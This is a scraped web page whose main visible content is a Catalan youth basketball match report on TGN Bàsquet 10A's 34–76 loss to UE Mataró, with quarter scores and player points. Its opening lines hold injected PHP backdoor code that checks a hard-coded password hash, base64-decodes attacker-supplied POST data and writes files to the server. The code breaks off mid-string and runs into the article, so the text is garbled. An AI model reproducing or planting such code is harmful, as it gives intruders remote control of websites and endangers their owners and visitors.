function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Derrota contra un dels millors equips de Catalunya! -

Derrota contra un dels millors equips de Catalunya!

Updated: febrer 7, 2023

El TGN Preinfantil femení 10A va jugar contra un dels millors equips de Catalunya, la UE Mataró. Tot i així l’equip va donar la cara i va lluitar tot el partit. El primer quart va ser el més complicat per part del conjunt lila en el qual a pesar d’atacar amb criteri va patir molt en defensa on el Mataró es va trobar molt còmode. A partir del segon quart el TGN va pujar el seu nivell defensiu i va competir de tu a tu amb el Mataró. En l’últim quart el TGN li va costar anotar, però tot i això no va deixar de lluitar fins a l’últim moment.

TGN BÀSQUET 10A34 – UE MATARÓ 76

PARCIALS: 10-24, 9-18, 11-18, 4-16

TGN BÀSQUET 10A: Parera (6), Porta (6), Seoane (9), Dominguez (3) i Salmeron (1)—cinc inicial— Sanchez (-), Ramón (2), Bueso (6) i Valls (1). LES XIFRES DEL PARTIT: 4/8 tirs lliures | 16 faltes

UE MATARÓ: Pizarro (10), Manrique (10), Villà (2), Navarrete (-) i García (8)—cinc inicial—García (4), Martínez (2), Llamas (10), Figueras (12), Arimon (7) i Sempere (11). LES XIFRES DEL PARTIT: 4/22 tirs lliures | 8 faltes